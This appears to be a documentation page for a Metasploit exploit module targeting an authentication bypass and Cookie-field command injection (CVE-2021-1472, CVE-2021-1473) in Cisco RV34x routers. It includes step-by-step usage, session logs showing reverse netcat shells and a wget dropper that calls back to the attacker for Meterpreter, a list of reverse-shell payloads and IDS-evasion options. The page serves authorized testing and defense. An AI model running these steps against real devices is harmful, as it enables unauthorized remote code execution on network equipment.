Cisco Small Business RV Series Authentication Bypass and Command Injection - Metasploit
This page contains detailed information about how to use the exploit/linux/http/cisco_rv_series_authbypass_and_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco Small Business RV Series Authentication Bypass and Command Injection
Module: exploit/linux/http/cisco_rv_series_authbypass_and_rce
Source code: modules/exploits/linux/http/cisco_rv_series_authbypass_and_rce.rb
Disclosure date: 2021-04-07
Last modification time: 2022-01-29 18:56:53 +0000
Supported architecture(s): cmd, armle
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-1472, CVE-2021-1473
This module exploits an authentication bypass
(CVE-2021-1472) and command injection (CVE-2021-1473) in the
Cisco Small Business RV series of VPN/routers. The device
does not adequately verify the credentials in the HTTP
Authorization field when requests are made to the /upload
endpoint. Then the upload.cgi binary will use the contents
of the HTTP Cookie field as part of a curl request aimed
at an internal endpoint. The curl request is executed using
popen and allows the attacker to inject commands via the
Cookie field. A remote and unauthenticated attacker using
this module is able to achieve code execution as www-data.
This module affects the RV340, RV340w, RV345, and RV345P
using firmware versions 1.0.03.20 and below.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/linux/http/cisco_rv_series_authbypass_and_rce
msf exploit(cisco_rv_series_authbypass_and_rce) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Description
This module exploits an authentication bypass (CVE-2021-1472) and command injection (CVE-2021-1473)
in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the
credentials in the HTTP Authorization field when requests are made to the /upload endpoint. Then
the upload.cgi binary will use the contents of the HTTP Cookie field as part of a curl request
aimed at an internal endpoint. The curl request is executed using popen and allows the attacker
to inject commands via the Cookie field.
A remote and unauthenticated attacker using this module is able to achieve code execution as www-data.
This module affects the RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below.
Installation
The Cisco Small Business RV Series VPN/Router is a physical device and is not known to have been successfully emulated. However, if you have a device, affected firmware can be downloaded here:
- https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.20?catid=268437899
Verification Steps
- Acquire an affected device and configure it with the affected firmware
- Do:
use exploit/linux/http/cisco_rv_series_authbypass_and_rce - Do:
set RHOST <ip> - Do:
check - Verify the remote target is flagged as likely vulnerable
- Do:
set LHOST <ip> - Do:
exploit - You should get a reverse shell.
Targets
0
This targets the VPN/Router with the reverse_netcat payload and returns a reverse shell.
1
This target obtains a meterpreter session using wget by default, but curl also works.
Exploitation of the target should work 100% of the time against vulnerable hosts. However,
at the time of writing, Meterpreter is crashing about 50% of the time after being
downloaded by the initial payload.
Options
TARGETURI
Specifies base URI. The default value is /.
Scenarios
Cisco RV340 using firmware version 1.0.03.20. Reverse shell to meterpreter session.
msf6 > use exploits/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set LHOST 10.0.0.6
LHOST => 10.0.0.6
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set target 1
target => 1
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > run
[*] Started reverse TCP handler on 10.0.0.6:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RIwkKfR
[*] Local IP: http://10.0.0.6:8080/RIwkKfR
[*] Client 10.0.0.8 (Wget) requested /RIwkKfR
[*] Sending payload to 10.0.0.8 (Wget)
[*] Sending stage (903400 bytes) to 10.0.0.8
[+] Exploit successfully executed.
[*] Meterpreter session 1 opened (10.0.0.6:4444 -> 10.0.0.8:34201 ) at 2022-01-29 18:48:24 -0800
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Server stopped.
meterpreter > shell
Process 2545 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux router0B874A 4.1.8 #2 SMP Thu Sep 17 09:26:06 IST 2020 armv7l GNU/Linux
ps faux
1 root 2476 S /sbin/procd
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW< [kworker/0:0H]
6 root 0 SW [kworker/u4:0]
7 root 0 SW [rcu_sched]
8 root 0 SW [rcu_bh]
9 root 0 SW [migration/0]
10 root 0 SW [migration/1]
11 root 0 SW [ksoftirqd/1]
12 root 0 SW [kworker/1:0]
13 root 0 SW< [kworker/1:0H]
14 root 0 SW< [khelper]
15 root 0 SW< [perf]
16 root 0 SW [kworker/u4:1]
242 root 0 SW< [writeback]
243 root 0 SW< [crypto]
245 root 0 SW [kworker/0:1]
246 root 0 SW< [bioset]
247 root 0 SW< [kblockd]
301 root 0 SW [kswapd0]
338 root 0 SW [scsi_eh_0]
339 root 0 SW< [scsi_tmf_0]
342 root 0 SW [scsi_eh_1]
343 root 0 SW< [scsi_tmf_1]
381 nobody 1968 S /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
467 root 0 SW< [dwc_otg]
468 root 0 SW [kworker/1:2]
471 root 0 SW< [ipv6_addrconf]
545 root 0 SW< [deferwq]
550 root 0 SW [ubi_bgt0d]
553 root 0 SW [ubifs_bgt0_0]
851 root 1752 S /sbin/ubusd
1006 root 1772 S /sbin/askfirst /bin/login
2378 root 0 SW [yaffs-bg-1]
2380 root 0 SW [yaffs-bg-1]
2382 root 0 SW [yaffs-bg-1]
2384 root 0 SW [yaffs-bg-1]
2402 root 0 DW [pfe_ctrl_timer]
2518 www-data 1060 S /tmp/jUehMqxi
2536 root 0 SW [ocf_0]
2537 root 0 SW [ocf_ret_0]
2538 root 0 SW [ocf_1]
2539 root 0 SW [ocf_ret_1]
2545 www-data 3116 S /bin/sh
2623 root 2984 S sleep 5
2624 www-data 3228 R ps faux
2710 root 0 SW [ocf-random]
2821 root 0 SW< [abm_wq]
2990 root 0 SW [pptp_th_1]
3180 root 1796 S /sbin/hotplug2 --override --persistent --set-rules-f
3259 root 0 DW [c2krv340_reset]
4318 root 18112 S /usr/bin/xosdsd
4484 root 3116 S {ch_agent_monito} /bin/sh /usr/bin/ch_agent_monitor
4488 root 135m S /usr/bin/call_home_agent -c /etc/license/ch_config
4637 root 3116 S {smart_agent_mon} /bin/sh /usr/bin/smart_agent_monit
4645 root 69976 S /usr/bin/smart_agent -c /mnt/license -i /etc/license
5056 root 1652 S rtupd
5070 root 2408 S /sbin/netifd
5482 root 43952 S /usr/lib/confd/erts/bin/confd -K false -B -MHe true
5561 root 6632 S ucicfg_init -c /tmp/etc/config/ -m /mnt/configcert/c
5588 root 6636 S ucicfg_hook
5712 root 6640 S ucicfg_network -c /tmp/etc/config/ -m /mnt/configcer
5728 root 6640 S ucicfg_security -c /tmp/etc/config/ -m /mnt/configce
5752 root 6640 S ucicfg_system -c /tmp/etc/config/ -m /mnt/configcert
6554 root 0 SW [kworker/0:2]
6662 root 6896 S operdb_stats
6663 root 14112 S opsdb_cisco
6915 root 6636 S ucicfg_aaa
7034 root 6636 S ucicfg_license
7057 www-data 6740 S webcache
7133 root 3116 S udhcpc -p /var/run/udhcpc-eth0.pid -s /lib/netifd/dh
7135 root 3116 S udhcpc -p /var/run/udhcpc-eth2.pid -s /lib/netifd/dh
7199 root 3308 S ntpd -d -p 0.ciscosb.pool.ntp.org -p 1.ciscosb.pool.
7281 network 3024 S /usr/sbin/zebra -d
7285 network 2816 S /usr/sbin/ripd -d
7289 network 2800 S /usr/sbin/ripngd -d
7295 root 2520 S /usr/sbin/watchquagga -d -z -T 60 -R /usr/sbin/quagg
7843 root 2112 S /usr/sbin/dropbear -F -P /var/run/dropbear.1.pid -p
8188 root 3116 S {mwan3track} /bin/sh /usr/sbin/mwan3track wan1 eth2
8296 root 30504 S /usr/bin/cmm -f /etc/config/fastforward
8668 root 1808 S xl2tpd
9889 root 16316 S /usr/bin/python /usr/lib/python2.7/site-packages/pnp
10630 root 9072 S < decomp_server
10632 root 12948 S casa
10684 root 1884 S lcavc
10750 root 14248 S lcstat daemon
10851 root 2152 S /usr/sbin/lldpd -I eth3*
10857 root 10124 S /usr/sbin/lldpd -I eth3*
10873 root 80496 S wfapp 50001 42 1 0 0 RV340-WB PSZ24161FA9
10986 root 6216 S {vpnTimer} /usr/bin/perl -w /usr/sbin/vpnTimer
10987 root 6084 S {vpnLed} /usr/bin/perl -w /usr/sbin/vpnLed
11055 root 3432 S /usr/lib/ipsec/starter --daemon charon
11056 root 137m S /usr/lib/ipsec/charon --use-syslog --debug-chd 2 --d
11058 root 16316 S /usr/bin/python /usr/lib/python2.7/site-packages/pnp
12037 root 4624 S notifyd -i 127.0.0.1
12055 root 16212 S nginx: master process /usr/sbin/nginx
12065 www-data 7456 S uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12066 www-data 7124 S uwsgi -m --ini /etc/uwsgi/blockpage.ini
12067 www-data 7124 S uwsgi -m --ini /etc/uwsgi/upload.ini
12111 www-data 7216 S uwsgi -m --ini /etc/uwsgi/upload.ini
12112 www-data 7548 S uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12113 www-data 7548 S uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12114 www-data 7124 S uwsgi -m --ini /etc/uwsgi/blockpage.ini
12115 www-data 7548 S uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12116 www-data 7548 S uwsgi -m --ini /etc/uwsgi/jsonrpc.ini
12444 root 24804 S /usr/bin/snmpglue -n 1
12794 root 3224 S /usr/sbin/crond -c /mnt/configcert/crontabs -l 5
14266 root 5128 S {syslog-ng} supervising syslog-ng
14267 root 5480 S /usr/sbin/syslog-ng -f /tmp/syslog-ng.conf
28966 www-data 3116 S sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se
28967 www-data 3116 S sh -c curl http://127.0.0.1/jsonrpc.cgi --cookie 'se
28969 www-data 3116 S nc 10.0.0.6 4444
28970 www-data 3116 S /bin/sh
30804 nobody 2676 S avahi-daemon: running [router0B874A.local]
30855 www-data 16372 S nginx: worker process
30856 www-data 16212 S nginx: worker process
30857 www-data 16212 S nginx: worker process
30858 www-data 16368 S nginx: worker process
Cisco RV340 using firmware version 1.0.03.20. Reverse shell with reverse netcat.
msf6 > use exploits/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set LHOST 10.0.0.6
LHOST => 10.0.0.6
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > run
[*] Started reverse TCP handler on 10.0.0.6:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 1 opened (10.0.0.6:4444 -> 10.0.0.8:34155 ) at 2022-01-29 18:46:01 -0800
[+] Exploit successfully executed.
uname -a
Linux router0B874A 4.1.8 #2 SMP Thu Sep 17 09:26:06 IST 2020 armv7l GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
netstat -tlpn
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:12321 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8866 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8008 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2601 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2602 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9003 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2603 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:54316 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 30855/nginx: worker
tcp 0 0 127.0.0.1:2001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9010 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4565 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2103 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:47864 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 30855/nginx: worker
tcp 0 0 0.0.0.0:830 0.0.0.0:* LISTEN -
tcp 0 0 :::2601 :::* LISTEN -
tcp 0 0 :::2602 :::* LISTEN -
tcp 0 0 :::2603 :::* LISTEN -
tcp 0 0 :::80 :::* LISTEN 30855/nginx: worker
tcp 0 0 :::53 :::* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::443 :::* LISTEN 30855/nginx: worker
tcp 0 0 :::830 :::* LISTEN -
Cisco RV340 using firmware version 1.0.03.21. Failure to exploit.
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > set RHOST 10.0.0.8
RHOST => 10.0.0.8
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > check
[*] 10.0.0.8:443 - The target is not exploitable. The target did not respond with a 200 OK.
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) >
Go back to menu.
Msfconsole Usage
Here is how the linux/http/cisco_rv_series_authbypass_and_rce exploit module looks in the msfconsole:
msf6 > use exploit/linux/http/cisco_rv_series_authbypass_and_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show info
Name: Cisco Small Business RV Series Authentication Bypass and Command Injection
Module: exploit/linux/http/cisco_rv_series_authbypass_and_rce
Platform: Unix, Linux
Arch: cmd, armle
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-04-07
Provided by:
Takeshi Shiomitsu
jbaines-r7
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Unix Command
1 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Me
tasploit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loc
al machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Avoid: 1 characters
Description:
This module exploits an authentication bypass (CVE-2021-1472) and
command injection (CVE-2021-1473) in the Cisco Small Business RV
series of VPN/routers. The device does not adequately verify the
credentials in the HTTP Authorization field when requests are made
to the /upload endpoint. Then the upload.cgi binary will use the
contents of the HTTP Cookie field as part of a `curl` request aimed
at an internal endpoint. The curl request is executed using `popen`
and allows the attacker to inject commands via the Cookie field. A
remote and unauthenticated attacker using this module is able to
achieve code execution as `www-data`. This module affects the RV340,
RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and
below.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-1472
https://nvd.nist.gov/vuln/detail/CVE-2021-1473
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx
https://seclists.org/fulldisclosure/2021/Apr/39
https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
Module Options
This is a complete list of options available in the linux/http/cisco_rv_series_authbypass_and_rce exploit:
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show options
Module options (exploit/linux/http/cisco_rv_series_authbypass_and_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the lo
cal machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
Advanced Options
Here is a complete list of advanced options supported by the linux/http/cisco_rv_series_authbypass_and_rce exploit:
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show advanced
Module advanced options (exploit/linux/http/cisco_rv_series_authbypass_and_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning
up files
AutoCheck true no Run check before exploit
CMDSTAGER::DECODER no The decoder stub to use.
CMDSTAGER::FLAVOR auto no The CMD Stager to use. (Accepted: auto, wget, curl)
CMDSTAGER::SSL false no Use SSL/TLS for supported stagers
CMDSTAGER::TEMP no Writable directory for staged files
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set
to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a p
ayload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is
missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable temp
late
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to exist
ing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset
to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
ListenerComm no The specific communication channel to use for this ser
vice
MSI::Custom no Use custom msi instead of automatically generating a p
ayload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM i
f accepted)
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "
ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS a
nd SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/5.0 (Macintosh; Intel M no The User-Agent header to use for all requests
ac OS X 12.0; rv:94.0) Gecko/20
100101 Firefox/94.0
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript
)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will N
OT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect f
ails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempt
s
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/http/cisco_rv_series_authbypass_and_rce module can exploit:
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Unix Command
1 Linux Dropper
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/cisco_rv_series_authbypass_and_rce exploit:
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
3 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
4 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
5 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
6 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
7 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
8 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
15 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
16 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
17 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
18 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
19 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
20 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
21 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
22 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
23 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
24 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
25 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
26 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
27 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
28 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
29 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
30 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
31 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
32 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
33 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
34 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
35 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
36 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
37 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
38 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
39 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
40 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
41 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
42 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
43 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
44 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
45 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
46 payload/generic/custom normal No Custom Payload
47 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
48 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
49 payload/generic/ssh/interact normal No Interact with Established SSH Connection
Evasion Options
Here is the full list of possible evasion options supported by the linux/http/cisco_rv_series_authbypass_and_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/http/cisco_rv_series_authbypass_and_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunke
d"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accep
ted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accep
ted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and versio
n
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Acce
pted: space, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes,
hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Didn't receive a response from the target.
Here is a relevant code snippet related to the "Didn't receive a response from the target." error message:
134: # The system doesn't have a good way to snag the version. This check attempts the exploit
135: # with a command that returns immediately (id) and checks that the response looks like
136: # how a vulnerable target would respond.
137: def check
138: res = send_exploit('id')
139: return CheckCode::Unknown("Didn't receive a response from the target.") unless res
140: return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
141:
142: if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143: return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144: end
The target did not respond with a 200 OK.
